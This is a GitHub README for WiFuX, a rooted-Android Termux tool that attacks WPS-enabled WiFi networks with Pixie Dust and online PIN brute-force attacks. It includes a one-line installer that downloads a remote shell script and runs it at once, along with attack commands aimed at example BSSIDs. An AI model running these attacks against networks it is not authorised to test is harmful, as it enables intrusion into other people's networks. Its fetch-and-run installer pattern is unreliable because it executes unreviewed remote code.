Skip to content

msrofficial/WiFuX

Repository files navigation

📶 WiFuX - WiFi Hacker Tool

🔥 Hack WiFi Using Termux (Requires Root)

A powerful WiFi hacking tool designed for ethical use to test the security of wireless networks using WPS vulnerabilities, including Pixie Dust Attack, Brute-force Attack, and more.


One-Command Installation

Paste this into Termux:

curl -sLo installer.sh https://raw.githubusercontent.com/msrofficial/WiFuX/main/installer.sh && bash installer.sh

🛠 Manual Installation

pkg update && pkg upgrade -y
pkg install root-repo -y
pkg install git tsu python wpa-supplicant pixiewps iw -y
git clone https://github.com/msrofficial/WiFuX
cd WiFuX
pip3 install -r requirements.txt
chmod +x main.py && install.sh
./install.sh

Restart your Termux and run:

wifux

💻 Usage

Show Help

sudo python main.py --help

Scan & Start Pixie Dust Attack

sudo python main.py -i wlan0 -K

Start Pixie Dust Attack on Specific BSSID

sudo python main.py -i wlan0 -b 00:91:4C:C3:AC:28 -K

Launch Online WPS Brute-force Attack with PIN

sudo python main.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234

⚠️ Notes

  • First turn off your WiFi.
  • Turn on Hotspot.
  • If you get "Device or resource busy (-16)", turn on WiFi and then turn it off again.
  • If failed, turn off Location services if turned on.

📌 Disclaimer

This tool is for educational and ethical purposes only. Do not use without proper authorization. The author is not responsible for any misuse or damage caused by this tool.


📄 License

This project is licensed under the MIT License — see the LICENSE file for details.


📱 WiFi Hacking with Android

WiFuX is fully compatible with Android devices running Termux. You can perform advanced WiFi penetration testing directly from your phone with root access and a supported wireless interface (e.g., Alfa adapter via OTG).

Make sure:

  • Your device supports monitor mode.
  • You're using a rooted Android environment.
  • WiFi is turned off before running the script.

🧑‍💻 Author

MD Sakibur Rahman (MSR)
GitHub: @msrofficial
Facebook: sakibur.msr
Portfolio: https://msrsakibur.netlify.app


❤️ Connect with Me

━━━━ Connect with me ━━━━

Facebook Visitor Count

📦 Repository

GitHub Repo


Happy hacking, stay ethical! 💻🔒